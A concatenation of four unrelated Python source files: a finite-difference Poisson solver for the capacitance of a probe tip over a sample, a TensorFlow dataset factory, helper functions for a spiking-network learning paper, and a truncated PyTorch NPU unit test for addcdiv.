self.data.append(val)
def to_csr(self, shape=None):
return sparse.csr_matrix(sparse.coo_matrix((self.data, (self.rows, self.cols)), shape=shape))
# All good! It is the same...
def poisson_variable_spacing_radial_faster(x, y):
Nx = len(x)
Ny = len(y)
hx = np.diff(x)
hy = np.diff(y)
ab = arrayBuilder()
for i in range(Ny):
for j in range(Nx): # Radial
ind = i * Nx + j # This point
ixp = ind + 1 # +x
ixn = ind - 1 # -x
# Goes last...
iyp = (i+1)*Nx + j # +y
# Goes first...
iyn = (i-1)*Nx + j # -y
Dx_plus = hx[j] if j < (Nx-1) else 0.0
Dx_minus = hx[j-1] if j > 0 else hx[j]
x0 = x[j]
Dy_plus = hy[i] if i < (Ny-1) else 0.0
Dy_minus = hy[i-1] if i > 0 else 0.0
prefactor_x = 4/((Dx_plus+Dx_minus)*(Dx_plus**2 + Dx_minus**2))
prefactor_y = 4/((Dy_plus+Dy_minus)*(Dy_plus**2 + Dy_minus**2))
dia_ind = (Dx_plus+Dx_minus) * prefactor_x + (Dy_plus+Dy_minus) * prefactor_y
if j == (Nx - 1):
dia_ind += -1 / (x0 * (Dx_plus+Dx_minus)) # 1st order difference uses the g
ab(ind, ind, dia_ind)
if j == 0:
ab(ind, ixp, -2 * Dx_minus * prefactor_x) # That's it, no radial derivative here...
elif j < (Nx - 1):
ab(ind, ixp, -1 * Dx_minus * prefactor_x + -1 / (x0 * (Dx_plus+Dx_minus)))
if j > 0:
ab(ind, ixn, -1 * Dx_plus * prefactor_x + 1 / (x0 * (Dx_plus+Dx_minus)))
if i > 0:
ab(ind, iyn, -1 * Dy_plus * prefactor_y)
if i < (Ny-1):
ab(ind, iyp, -1 * Dy_minus * prefactor_y)
return sparse.csr_matrix(sparse.coo_matrix((ab.data, (ab.rows, ab.cols)), shape=(Nx*Ny, Nx*Ny))) # Convert to better format for usage
def grid_area(r, z):
"""
Parameters:
r : 1d array of radii
z : 1d array of z coordinates
Returns the area of each grid cell (with z in rows, r in columns)."""
# Area of each grid element is π * (R_outer^2 - R_inner^2) * (Δz)
dr2 = np.diff(r**2)
return np.pi * np.diff(z).reshape((-1, 1)) @ dr2.reshape((1, -1))
def E_field(u, r, z):
"""
u: Voltage on the grid (by convention, rows are z, columns are r)
r: 1D array of radii
z: 1D array of z coordinates
Return: The electric field wrt to r and z,
Works for r, z (cylindrical coordinates), or x, y (Cartesian coordinates)."""
Ny = len(z)
Nx = len(r)
Ey1 = np.diff(u.reshape((Ny, Nx)), axis=0) / np.diff(z).reshape((-1, 1))
Ex1 = np.diff(u.reshape((Ny, Nx)), axis=1) / np.diff(r).reshape((1, -1))
Ex = 0.5 * (Ex1[:-1, :] + Ex1[1:, :])
Ey = 0.5 * (Ey1[:, :-1] + Ey1[:, 1:])
return Ex + 1j*Ey
@dataclass
class Params:
Rtip : float = 20.0
theta_deg : float = 15.0
Hcone : float = 15000.0
Hcant : float = 500.0
Rcant : float = 15000.0
zMax : float = Rtip*1000.0
rhoMax : float = Rtip*1000.0
h0 : float = Rtip * 0.02
d : float = Rtip
Nuni : int = 50 # Uniformly spaced points in the r and z_plus directions
Nr : int = 500
Nz_plus : int = 500
hsam : float = 0.0 # No sample thickness for now...
@property
def theta(self) -> float:
return self.theta_deg * np.pi/180
@dataclass
class ParamsSample:
Rtip : float = 20.0
theta_deg : float = 15.0
Hcone : float = 15000.0
Hcant : float = 500.0
Rcant : float = 15000.0
zMax : float = Rtip*1000.0
rhoMax : float = Rtip*1000.0
h0 : float = Rtip * 0.02
d : float = Rtip
Nuni : int = 50 # Uniformly spaced points in the r and z_plus directions
Nr : int = 500
Nz_plus : int = 500
hsam : float = 1.0
eps_r : float = 3.0
equally_spaced_sample : bool = True
@property
def theta(self) -> float:
return self.theta_deg * np.pi/180
@dataclass
class AllParams:
dmin : float
dmax : float
istep : int
Rtip : float = 20.0
theta_deg : float = 15.0
Hcone : float = 15000.0
Hcant : float = 500.0
Rcant : float = 15000.0
zMax : float = Rtip*1000.0
rhoMax : float = Rtip*1000.0
h0 : float = Rtip * 0.02
Nuni : int = 50 # Uniformly spaced points in the r and z_plus directions
Nr : int = 500
Nz_plus : int = 500
hsam : float = 1.0
eps_r : float = 3.0
equally_spaced_sample : bool = True
pt : int = 0
@property
def theta(self) -> float:
return self.theta_deg * np.pi/180
@property
def Npts(self) -> int:
return int(np.round((self.dmax - self.dmin) / (self.h0 * self.istep)))+1
@property
def ds(self) -> np.array:
return self.dmin + np.arange(self.Npts) * self.istep * self.h0
@property
def d(self) -> float:
return self.ds[self.pt]
class CapSolAll:
def __init__(self, params: AllParams):
self.params = params
self.r, self.r_ratio = guni_grid(params.Nuni, params.Nr, params.h0, params.rhoMax)
self.z_plus, self.z_ratio = guni_grid(params.Nuni, params.Nz_plus,
params.h0, params.zMax)
self._setup_z_grid()
self._setup_grid_and_boundary()
def _setup_z_grid(self):
params = self.params
if params.equally_spaced_sample:
self.z_minus = generate_gapsam_grid(params.h0, params.hsam, params.d)
else:
raise ValueError("Non-equally spaced sample points not yet implemented.")
# Make the final, overall, z grid:
self.z = np.r_[self.z_minus, self.z_plus]
def _setup_grid_and_boundary(self):
params = self.params
self.eps_z = epsilon_z(self.z, self.params.d, self.params.eps_r)
self.R, self.Z = np.meshgrid(self.r, self.z)
self.spm_tip = (sphere(self.R, self.Z, self.params.Rtip) +
cone(self.R, self.Z, params.Rtip, params.theta, params.Hcone) +
body(self.R, self.Z, params.Hcone, params.Hcant, params.Rcant)
)
self.Nr = len(self.r)
self.Nz = len(self.z)
self.outer_boundary = boundary_radial(self.Nr, self.Nz)
self.boundary = self.spm_tip.ravel() + self.outer_boundary
self.u = np.zeros_like(self.R)
self.u[self.spm_tip] = 1.0
def setup_matrices_init(self):
self.A = poisson_var_rad_samp_fast(self.r, self.z, self.eps_z)
self.f = -self.A @ self.u.ravel()
self.A_free = self.A[~self.boundary].T[~self.boundary].T
self.f_free = self.f[~self.boundary]
def solve_init(self):
u_cut = la.spsolve(self.A_free, self.f_free)
self.u = self.u.ravel()
self.u[~self.boundary] = u_cut
self.u = self.u.reshape((self.Nz, self.Nr))
def solve_new(self, guess, solver=la.cgs):
u_cut, info = solver(self.A_free, self.f_free, guess)
# Check whether info is zero...
# print(info)
self.u = self.u.ravel()
self.u[~self.boundary] = u_cut
self.u = self.u.reshape((self.Nz, self.Nr))
def process(self):
self.dV = dV = grid_area(self.r, self.z)
self.energy = 0.5 * np.sum(dV * self.eps_z.reshape((-1, 1)) * abs(E_field(self.u, self.r, self.z))**2) * 1e-9 * 8.854e-12
self.energy_z = 0.5 * np.sum(dV * self.eps_z.reshape((-1, 1)) * E_field(self.u, self.r, self.z).imag**2) * 1e-9 * 8.854e-12
self.c=self.energy*2
return self.c # In SI Units...
def run(self, solver=la.bicgstab):
p = self.params
self.C = np.zeros_like(p.ds)
print(f"Stepping from {p.d} to {p.dmax} by {p.istep*p.h0} nm")
print(f"Total simulations: {p.Npts}")
for i, dist in enumerate(p.ds):
p = self.params
start_time = dt.now()
if i == 0:
self.setup_matrices_init()
end_setup_time = dt.now()
setup_time = end_setup_time - start_time
self.solve_init()
solve_time = dt.now() - end_setup_time
else:
# We need to setup the z grid again since the distance increased...
self._setup_z_grid()
# New meshgrid and boundary function
self._setup_grid_and_boundary()
self.setup_matrices_init()
end_setup_time = dt.now()
setup_time = end_setup_time - start_time
guess = np.r_[self.u[:p.istep], self.u_old]
# print(guess.shape)
# print(self.u.shape)
self.solve_new(guess=guess.ravel()[~self.boundary], solver=solver)
solve_time = dt.now() - end_setup_time
self.C[i] = self.process() # Save capacitance to array...
self.u_old = copy.copy(self.u)
print(f"{i+1}. d = {p.d} nm, tSetup = {setup_time.seconds/60:.2f} m, tSolve = {solve_time.seconds/60:.2f} m, C = {self.C[i]:.4e} F")
# print(self.params.d)
self.params.pt += 1
# print(self.params.d)
class CapSolAllRev:
def __init__(self, params: AllParams):
self.params = params
self.r, self.r_ratio = guni_grid(params.Nuni, params.Nr, params.h0, params.rhoMax)
self.z_plus, self.z_ratio = guni_grid(params.Nuni, params.Nz_plus,
params.h0, params.zMax)
self._setup_z_grid()
self._setup_grid_and_boundary()
def _setup_z_grid(self):
params = self.params
if params.equally_spaced_sample:
self.z_minus = generate_gapsam_grid(params.h0, params.hsam, params.d)
else:
raise ValueError("Non-equally spaced sample points not yet implemented.")
# Make the final, overall, z grid:
self.z = np.r_[self.z_minus, self.z_plus][::-1] # Reverse the z grid...
def _setup_grid_and_boundary(self):
params = self.params
self.eps_z = epsilon_z(self.z, self.params.d, self.params.eps_r)
self.R, self.Z = np.meshgrid(self.r, self.z)
self.spm_tip = (sphere(self.R, self.Z, self.params.Rtip) +
cone(self.R, self.Z, params.Rtip, params.theta, params.Hcone) +
body(self.R, self.Z, params.Hcone, params.Hcant, params.Rcant)
)
self.Nr = len(self.r)
self.Nz = len(self.z)
self.outer_boundary = boundary_radial(self.Nr, self.Nz)
self.boundary = self.spm_tip.ravel() + self.outer_boundary
self.u = np.zeros_like(self.R)
self.u[self.spm_tip] = 1.0
def setup_matrices_init(self):
self.Ab = _poisson_var_rad_samp_fast(self.r, self.z, self.eps_z)
self.A = self.Ab.to_csr(shape=(self.Nr*self.Nz, self.Nr * self.Nz))
self._apply_boundaries()
def setup_matrices_new(self):
# r, z need to have been updated by _setup_grid_and_boundary...
self.Ab = _poisson_finish(self.r, self.z, self.eps_z, self.Ab, self.params_old)
self.A = self.Ab.to_csr(shape=(self.Nr*self.Nz, self.Nr * self.Nz))
self._apply_boundaries()
def _apply_boundaries(self):
self.f = -self.A @ self.u.ravel()
self.A_free = self.A[~self.boundary].T[~self.boundary].T
self.f_free = self.f[~self.boundary]
def solve_init(self):
u_cut = la.spsolve(self.A_free, self.f_free)
self.u = self.u.ravel()
self.u[~self.boundary] = u_cut
self.u = self.u.reshape((self.Nz, self.Nr))
def solve_new(self, guess, solver=la.cgs):
u_cut, info = solver(self.A_free, self.f_free, guess)
# Check whether info is zero...
# print(info)
self.u = self.u.ravel()
self.u[~self.boundary] = u_cut
self.u = self.u.reshape((self.Nz, self.Nr))
def process(self):
self.dV = dV = grid_area(self.r, self.z)
self.energy = 0.5 * np.sum(dV * self.eps_z.reshape((-1, 1)) * abs(E_field(self.u, self.r, self.z))**2) * 1e-9 * 8.854e-12
self.energy_z = 0.5 * np.sum(dV * self.eps_z.reshape((-1, 1)) * E_field(self.u, self.r, self.z).imag**2) * 1e-9 * 8.854e-12
self.c=self.energy*2
return self.c # In SI Units...
def run(self, solver=la.bicgstab):
p = self.params
self.C = np.zeros_like(p.ds)
print(f"Stepping from {p.d} to {p.dmax} by {p.istep*p.h0} nm")
print(f"Total simulations: {p.Npts}")
for i, dist in enumerate(p.ds):
p = self.params
start_time = dt.now()
if i == 0:
self.setup_matrices_init()
end_setup_time = dt.now()
setup_time = end_setup_time - start_time
self.solve_init()
solve_time = dt.now() - end_setup_time
else:
# We need to setup the z grid again since the distance increased...
self._setup_z_grid()
# New meshgrid and boundary function
self._setup_grid_and_boundary()
self.setup_matrices_new()
end_setup_time = dt.now()
setup_time = end_setup_time - start_time
guess = np.r_[self.u[:p.istep], self.u_old]
# print(guess.shape)
# print(self.u.shape)
self.solve_new(guess=guess.ravel()[~self.boundary], solver=solver)
solve_time = dt.now() - end_setup_time
self.C[i] = self.process() # Save capacitance to array...
self.params_old = copy.copy(self.params)
self.u_old = copy.copy(self.u)
print(f"{i+1}. d = {p.d} nm, tSetup = {setup_time.seconds/60:.2f} m, tSolve = {solve_time.seconds/60:.2f} m, C = {self.C[i]:.4e} F")
# print(self.params.d)
self.params.pt += 1
# print(self.params.d)
class CapSol:
def __init__(self, params: Params):
self.params = params
self.r, self.r_ratio = guni_grid(params.Nuni, params.Nr, params.h0, params.rhoMax)
self.z_plus, self.z_ratio = guni_grid(params.Nuni, params.Nz_plus,
params.h0, params.zMax)
self.z_minus = generate_gapsam_grid(params.h0, params.hsam, params.d)
# Make the final, overall, z grid:
self.z = np.r_[self.z_minus, self.z_plus]
self.R, self.Z = np.meshgrid(self.r, self.z)
self.spm_tip = (sphere(self.R, self.Z, self.params.Rtip) +
cone(self.R, self.Z, params.Rtip, params.theta, params.Hcone) +
body(self.R, self.Z, params.Hcone, params.Hcant, params.Rcant)
)
self.Nr = len(self.r)
self.Nz = len(self.z)
self.outer_boundary = boundary_radial(self.Nr, self.Nz)
self.boundary = self.spm_tip.ravel() + self.outer_boundary
self.u = np.zeros_like(self.R)
self.u[self.spm_tip] = 1.0
def setup_matrices(self):
self.A = poisson_variable_spacing_radial(self.r, self.z)
self.f = -self.A @ self.u.ravel()
self.A_free = self.A[~self.boundary].T[~self.boundary].T
self.f_free = self.f[~self.boundary]
def solve(self):
u_cut = la.spsolve(self.A_free, self.f_free)
self.u = self.u.ravel()
self.u[~self.boundary] = u_cut
self.u = self.u.reshape((self.Nz, self.Nr))
def process(self):
self.dV = dV = grid_area(self.r, self.z)
self.energy = 0.5 * np.sum(dV * abs(E_field(self.u, self.r, self.z))**2) * 1e-9 * 8.854e-12
self.energy_z = 0.5 * np.sum(dV * E_field(self.u, self.r, self.z).imag**2) * 1e-9 * 8.854e-12
self.c=self.energy*2
return self.c # In SI Units...
def run(self):
print("Grids:")
print(f"r_ratio = {self.r_ratio:.3f}, z_ratio = {self.z_ratio:.3f}")
print("Setting up matrices:")
self.setup_matrices()
print("Solving...")
self.solve()
self.process()
print(f"C = {self.c:.5e} F")
print("Done!")
def __repr__(self):
return f"CapSol(params={repr(self.params)})"
class CapSolSample:
def __init__(self, params: ParamsSample):
self.params = params
self.r, self.r_ratio = guni_grid(params.Nuni, params.Nr, params.h0, params.rhoMax)
self.z_plus, self.z_ratio = guni_grid(params.Nuni, params.Nz_plus,
params.h0, params.zMax)
if params.equally_spaced_sample:
self.z_minus = generate_gapsam_grid(params.h0, params.hsam, params.d)
else:
raise ValueError("Non-equally spaced sample points not yet implemented.")
# Make the final, overall, z grid:
self.z = np.r_[self.z_minus, self.z_plus]
self._setup_grid_and_boundary()
def _setup_grid_and_boundary(self):
params = self.params
self.eps_z = epsilon_z(self.z, self.params.d, self.params.eps_r)
self.R, self.Z = np.meshgrid(self.r, self.z)
self.spm_tip = (sphere(self.R, self.Z, self.params.Rtip) +
cone(self.R, self.Z, params.Rtip, params.theta, params.Hcone) +
body(self.R, self.Z, params.Hcone, params.Hcant, params.Rcant)
)
self.Nr = len(self.r)
self.Nz = len(self.z)
self.outer_boundary = boundary_radial(self.Nr, self.Nz)
self.boundary = self.spm_tip.ravel() + self.outer_boundary
self.u = np.zeros_like(self.R)
self.u[self.spm_tip] = 1.0
def setup_matrices(self):
self.A = poisson_var_rad_samp_fast(self.r, self.z, self.eps_z)
self.f = -self.A @ self.u.ravel()
self.A_free = self.A[~self.boundary].T[~self.boundary].T
self.f_free = self.f[~self.boundary]
def solve(self):
u_cut = la.spsolve(self.A_free, self.f_free)
self.u = self.u.ravel()
self.u[~self.boundary] = u_cut
self.u = self.u.reshape((self.Nz, self.Nr))
def process(self):
self.dV = dV = grid_area(self.r, self.z)
self.energy = 0.5 * np.sum(dV * self.eps_z.reshape((-1, 1)) * abs(E_field(self.u, self.r, self.z))**2) * 1e-9 * 8.854e-12
self.energy_z = 0.5 * np.sum(dV * self.eps_z.reshape((-1, 1)) * E_field(self.u, self.r, self.z).imag**2) * 1e-9 * 8.854e-12
self.c=self.energy*2
return self.c # In SI Units...
def run(self):
print("Grids:")
print(f"r_ratio = {self.r_ratio:.3f}, z_ratio = {self.z_ratio:.3f}")
print("Setting up matrices:")
self.setup_matrices()
print("Solving...")
self.solve()
self.process()
print(f"C = {self.c:.5e} F")
print("Done!")
def __repr__(self):
return f"CapSolSample(params={repr(self.params)})"
class SphereTest:
def __init__(self, params: Params):
self.params = params
self.r, self.r_ratio = guni_grid(params.Nuni, params.Nr, params.h0, params.rhoMax)
self.z_plus, self.z_ratio = guni_grid(params.Nuni, params.Nz_plus,
params.h0, params.zMax)
self.z_minus = generate_gapsam_grid(params.h0, params.hsam, params.d)
# Make the final, overall, z grid:
self.z = np.r_[self.z_minus, self.z_plus]
self.R, self.Z = np.meshgrid(self.r, self.z)
self.spm_tip = sphere(self.R, self.Z, self.params.Rtip)
self.Nr = len(self.r)
self.Nz = len(self.z)
self.outer_boundary = boundary_radial(self.Nr, self.Nz)
self.boundary = self.spm_tip.ravel() + self.outer_boundary
self.u = np.zeros_like(self.R)
self.u[self.spm_tip] = 1.0
def setup_matrices(self):
self.A = poisson_variable_spacing_radial(self.r, self.z)
self.f = -self.A @ self.u.ravel()
self.A_free = self.A[~self.boundary].T[~self.boundary].T
self.f_free = self.f[~self.boundary]
def solve(self):
u_cut = la.spsolve(self.A_free, self.f_free)
self.u = self.u.ravel()
self.u[~self.boundary] = u_cut
self.u = self.u.reshape((self.Nz, self.Nr))
def process(self):
self.dV = dV = grid_area(self.r, self.z)
self.energy = 0.5 * np.sum(dV * abs(E_field(self.u, self.r, self.z))**2) * 1e-9 * 8.854e-12
self.energy_z = 0.5 * np.sum(dV * E_field(self.u, self.r, self.z).imag**2) * 1e-9 * 8.854e-12
self.c=self.energy*2
return self.c # In SI Units...
def run(self):
start_time = dt.now()
print("Grids:")
print(f"r_ratio = {self.r_ratio:.4f}, z_ratio = {self.z_ratio:.4f}")
print("Setting up matrices:")
self.setup_matrices()
now = dt.now()
print(f"Matrices set up in {now - start_time}")
print("Solving...")
self.solve()
print(f"Solved in {dt.now() - now}")
self.process()
print(f"C = {self.c:.5e} F")
print(f"Done! Total time: {dt.now() - start_time}")
def __repr__(self):
return f"CapSol(params={repr(self.params)})"
class SphereTestSample:
def __init__(self, params: ParamsSample):
self.params = params
self.r, self.r_ratio = guni_grid(params.Nuni, params.Nr, params.h0, params.rhoMax)
self.z_plus, self.z_ratio = guni_grid(params.Nuni, params.Nz_plus,
params.h0, params.zMax)
if params.equally_spaced_sample:
self.z_minus = generate_gapsam_grid(params.h0, params.hsam, params.d)
else:
raise ValueError("Non-equally spaced sample points not yet implemented.")
# Make the final, overall, z grid:
self.z = np.r_[self.z_minus, self.z_plus]
self._setup_grid_and_boundary()
def _setup_grid_and_boundary(self):
params = self.params
self.eps_z = epsilon_z(self.z, self.params.d, self.params.eps_r)
self.R, self.Z = np.meshgrid(self.r, self.z)
self.spm_tip = sphere(self.R, self.Z, self.params.Rtip)
self.Nr = len(self.r)
self.Nz = len(self.z)
self.outer_boundary = boundary_radial(self.Nr, self.Nz)
self.boundary = self.spm_tip.ravel() + self.outer_boundary
self.u = np.zeros_like(self.R)
self.u[self.spm_tip] = 1.0
def setup_matrices(self):
self.A = poisson_var_rad_samp_fast(self.r, self.z, self.eps_z)
self.f = -self.A @ self.u.ravel()
self.A_free = self.A[~self.boundary].T[~self.boundary].T
self.f_free = self.f[~self.boundary]
def solve(self):
u_cut = la.spsolve(self.A_free, self.f_free)
self.u = self.u.ravel()
self.u[~self.boundary] = u_cut
self.u = self.u.reshape((self.Nz, self.Nr))
def process(self):
self.dV = dV = grid_area(self.r, self.z)
self.energy = 0.5 * np.sum(dV * self.eps_z.reshape((-1, 1)) * abs(E_field(self.u, self.r, self.z))**2) * 1e-9 * 8.854e-12
self.energy_z = 0.5 * np.sum(dV * self.eps_z.reshape((-1, 1)) * E_field(self.u, self.r, self.z).imag**2) * 1e-9 * 8.854e-12
self.c=self.energy*2
return self.c # In SI Units...
def run(self):
start_time = dt.now()
print("Grids:")
print(f"r_ratio = {self.r_ratio:.4f}, z_ratio = {self.z_ratio:.4f}")
print("Setting up matrices:")
self.setup_matrices()
now = dt.now()
print(f"Matrices set up in {now - start_time}")
print("Solving...")
self.solve()
print(f"Solved in {dt.now() - now}")
self.process()
print(f"C = {self.c:.5e} F")
print(f"Done! Total time: {dt.now() - start_time}")
def __repr__(self):
return f"CapSol(params={repr(self.params)})"
def Totalsim(params, dmin, dmax, istep, fname, Test=0):
capacitances=[]
distances=np.arange(dmin, dmax, istep*params.h0)
print(distances)
for i, d in tqdm(enumerate(distances), total=len(distances)):
start_time= dt.now()
params.d = d
print(f"Distance {d} nm ({i}/{len(distances)})")
if Test==1:
sim=SphereTestSample(params)
else:
sim=CapSolSample(params)
sim.run()
capacitances.append(sim.c)
end_time=dt.now()
elapsed_time= end_time-start_time
print(elapsed_time)
np.savetxt(fname, np.c_[distances, capacitances], header='distance (nm) Capacitances(F)',
footer=f'Totalsim(params={params}, dmin={dmin}, dmax={dmax}, istep={istep}, fname={fname}, Test={Test})')
return distances, capacitances
def runnewcapsol(input_fname= "capsol.in", output_fname="C-Z.dat"):
gp=nac.get_gridparameters(input_fname)
params=ParamsSample(Rtip=gp["Rtip"], theta_deg=gp["half-angle"],
Hcone=gp["HCone"], Hcant=gp["thickness_Cantilever"],
Rcant=gp["RCantilever"], zMax=gp["z_max"], rhoMax=gp["rho_max"],
h0=gp["h0"], d=gp["min"], Nuni=gp["Nuni"], Nr=gp["n"],
Nz_plus=gp["m+"],hsam=gp["Thickness_sample"],
eps_r=gp['eps_r'], equally_spaced_sample=gp["Equally spaced"])
totalsim=Totalsim(params, gp["min"], gp["max"], gp["istep"], output_fname, gp["Test"])
return totalsim
# def runnewcapsol(input_fname= "capsol.in", output_fname="C-Z.dat"):
# gp=nac.get_gridparameters(input_fname)
# params=ParamsSample(Rtip=gp["Rtip"], theta_deg=gp["half-angle"],
# Hcone=gp["HCone"], Hcant=gp["thickness_Cantilever"],
# Rcant=gp["RCantilever"], zMax=gp["z_max"], rhoMax=gp["rho_max"],
# h0=gp["h0"], d=gp["min"], Nuni=gp["Nuni"], Nr=gp["n"],
# Nz_plus=gp["m+"],hsam=gp["Thickness_sample"],
# eps_r=gp['eps_r'], equally_spaced_sample=gp["equally_spaced_sample"])
# totalsim=Totalsim(params, gp["min"], gp["max"], gp["istep"], output_fname, gp["Test"])
# return totalsim |
# Copyright 2016 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""A factory-pattern class which returns classification image/label pairs."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import os
from datasets import fgvc
datasets_map = {
'ILSVRC2012': {'num_samples': {'train': 1281167, 'validation': 50000},
'num_classes': 1000},
'inat2017': {'num_samples': {'train': 665473, 'validation': 9697},
'num_classes': 5089},
'aircraft': {'num_samples': {'train': 6667, 'validation': 3333},
'num_classes': 100},
'cub_200': {'num_samples': {'train': 5994, 'validation': 5794},
'num_classes': 200},
'flower_102': {'num_samples': {'train': 2040, 'validation': 6149},
'num_classes': 102},
'food_101': {'num_samples': {'train': 75750, 'validation': 25250},
'num_classes': 101},
'nabirds': {'num_samples': {'train': 23929, 'validation': 24633},
'num_classes': 555},
'stanford_cars': {'num_samples': {'train': 8144, 'validation': 8041},
'num_classes': 196},
'stanford_dogs': {'num_samples': {'train': 12000, 'validation': 8580},
'num_classes': 120}
}
def get_dataset(name, split_name, root_dir, file_pattern=None, reader=None):
"""Given a dataset name and a split_name returns a Dataset.
Args:
name: String, the name of the dataset.
split_name: A train/validation split name.
root_dir: The root directory of all datasets.
file_pattern: The file pattern to use for matching the dataset source files.
reader: The subclass of tf.ReaderBase. If left as `None`, then the default
reader defined by each dataset is used.
Returns:
A `Dataset` class.
Raises:
ValueError: If the dataset `name` is unknown.
"""
if name not in datasets_map:
raise ValueError('Name of dataset unknown %s' % name)
return fgvc.get_split(
split_name,
os.path.join(root_dir, name),
datasets_map[name]['num_samples'],
datasets_map[name]['num_classes'],
file_pattern,
reader)
|
'''
This is the Learning Through Target Spikes (LTTS) repository for code associated to
the paper: Paolo Muratore, Cristiano Capone, Pier Stanislao Paolucci (2020)
"Target spike patterns enable efficient and biologically plausible learning for
complex temporal tasks*" (currently *under review*).
Please give credit to this paper if you use or modify the code in a derivative work.
This work is licensed under the Creative Commons Attribution 4.0 International License.
To view a copy of this license, visit http://creativecommons.org/licenses/by/4.0/
or send a letter to Creative Commons, PO Box 1866, Mountain View, CA 94042, USA.
'''
import numpy as np
from functools import reduce
def kTrajectory (T, K = 3, Ar = (0.5, 2.0), Wr = (1, 2, 3, 5), offT = 0, norm = False):
P = [];
for k in range (K):
A = np.random.uniform (*Ar, size = 4);
W = np.array (Wr) * 2. * np.pi;
F = np.random.uniform (0., 2. * np.pi, size = len (W));
t = np.linspace (0., 1., num = T);
p = 0.
for a, w, f in zip (A, W, F):
p += a * np.cos (t * w + f);
P.append (p);
P = np.array (P);
# Here we normalize our trajectories
P = P / np.max (P, axis = 1).reshape (K, 1) if norm else P;
# Here we zero-out the initial offT entries of target
P [:, :offT] = 0.;
return P;
def kClock (T, K = 5):
C = np.zeros ((K, T));
for k, tick in enumerate (C):
range = T // K;
tick [k * range : (k + 1) * range] = 1;
return C;
def sfilter (seq, itau = 0.5):
filt_seq = np.zeros (seq.shape);
for t, s in enumerate (seq.T):
filt_seq [:, t] = filt_seq [:, t - 1] * itau + s * (1. - itau) if t > 0 else seq [:, 0];
return filt_seq;
def dJ_rout (J_rout, targ, S_rout):
Y = J_rout @ S_rout;
return (targ - Y) @ S_rout.T;
def read (S, J_rout, itau_ro = 0.5):
out = sfilter (S, itau = itau_ro);
return J_rout @ out;
def gaussian (x, mu = 0., sig = 1.):
return np.exp (-np.power (x - mu, 2.) / (2 * np.power (sig, 2.)))
def parityCode (N = 2, off = 10):
def xor(a, b): return a ^ b;
def mask(i, T):
m = np.zeros (T, dtype = np.bool);
# Grab the binary representation
bin = [int(c) for c in f'{i:b}'.zfill(N)];
for t, b in enumerate (bin):
m [off * ( 1 + 3 * t) : off * (2 + 3 * t + b)] = True
return m;
# Here we compute the total time needed for this parity code
T = off + 2 * N * off + (N - 1) * off + 2 * off + 3 * off + off;
Inp = np.zeros ((2**N, T));
Out = np.zeros ((2**N, T));
t = np.linspace (0., 3 * off, num = 3 * off);
for i, (inp, out) in enumerate (zip (Inp, Out)):
inp[mask(i, T)] = 1;
sgn = 2 * reduce(xor, [int(c) for c in f'{i:b}']) - 1;
out[-4 * off : -off] = sgn * gaussian(t, mu = 1.5 * off, sig = off * 0.5);
return Inp, Out;
def shuffle(iter):
rng_state = np.random.get_state();
for a in iter:
np.random.shuffle(a);
np.random.set_state(rng_state);
|
# Copyright (c) 2020 Huawei Technologies Co., Ltd
# Copyright (c) 2019, Facebook CORPORATION.
# All rights reserved.
#
# Licensed under the BSD 3-Clause License (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://opensource.org/licenses/BSD-3-Clause
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import torch
import numpy as np
import copy
from common_utils import TestCase, run_tests
from common_device_type import dtypes, instantiate_device_type_tests
from util_test import create_common_tensor
class TestAddcdiv(TestCase):
def test_addcdiv(self, device):
def _test_addcdiv(a, alpha, b, c):
actual = torch.addcdiv(a, b, c, value=alpha)
# implementation of addcdiv downcasts alpha. arithmetic ops don't.
if not actual.dtype.is_floating_point:
alpha = int(alpha)
expected = a + (alpha * b) / c
# print(expected)
# print(actual)
self.assertTrue(torch.allclose(expected.to("cpu"), actual.to("cpu"), equal_nan=True))
with self.maybeWarnsRegex(
UserWarning, "This overload of addcdiv is deprecated"):
self.assertEqual(actual.to("cpu"), torch.addcdiv(a, alpha, b, c).to("cpu"))
def non_zero_rand(size, dtype, device):
if dtype.is_floating_point:
a = torch.rand(size=size, dtype=dtype, device="cpu")
a = a.to("npu") # torch.rand()在npu暂未适配
elif dtype == torch.uint8:
a = torch.randint(1, 5, size=size, dtype=dtype, device=device)
else:
a = torch.randint(-5, 5, size=size, dtype=dtype, device=device)
# return a + (a == 0).type(dtype) #add 方法有些问题,先注释不使用
return a.type(dtype)
for dtype in torch.testing.get_all_math_dtypes(device):
# print(dtype, " : ", device)
if dtype in [torch.uint8, torch.int8, torch.int16, torch.int32, torch.int64, torch.float64]:
continue
_test_addcdiv(
non_zero_rand((2, 2), dtype=dtype, device=device),
0.5,
non_zero_rand((2, 2), dtype=dtype, device=device),
non_zero_rand((2, 2), dtype=dtype, device=device))
def generate_data(self, min, max, shape, dtype):
input1 = np.random.uniform(min, max, shape).astype(dtype)
input2 = np.random.uniform(min, max, shape).astype(dtype)
input3 = np.random.uniform(min, max, shape).astype(dtype)
# 将numpy.ndarray转换为torch.tensor
npu_input1 = torch.from_numpy(input1)
npu_input2 = torch.from_numpy(input2)
npu_input3 = torch.from_numpy(input3)
return npu_input1, npu_input2, npu_input3
def generate_single_data(self, min, max, shape, dtype):
input = np.random.uniform(min, max, shape).astype(dtype)
npu_input = torch.from_numpy(input)
return npu_input
def generate_scalar(self, min, max):
scalar = np.random.uniform(min, max)
return scalar
def generate_int_scalar(self, min, max):
scalar = np.random.randint(min, max)
return scalar
def test_addcdiv_float32(self, device):
def cpu_op_exec(input1, input2, input3, scalar):
output = torch.addcdiv(input1, input2, input3, value=scalar)
return output
def npu_op_exec(input1, input2, input3, scalar):
input1 = input1.to("npu")
input2 = input2.to("npu")
input3 = input3.to("npu")
output = torch.addcdiv(input1, input2, input3, value=scalar)
output = output.to("cpu")
return output
npu_input1, npu_input2, npu_input3 = self.generate_data(1, 100, (5, 3), np.float32)
scalar = self.generate_scalar(1, 10)
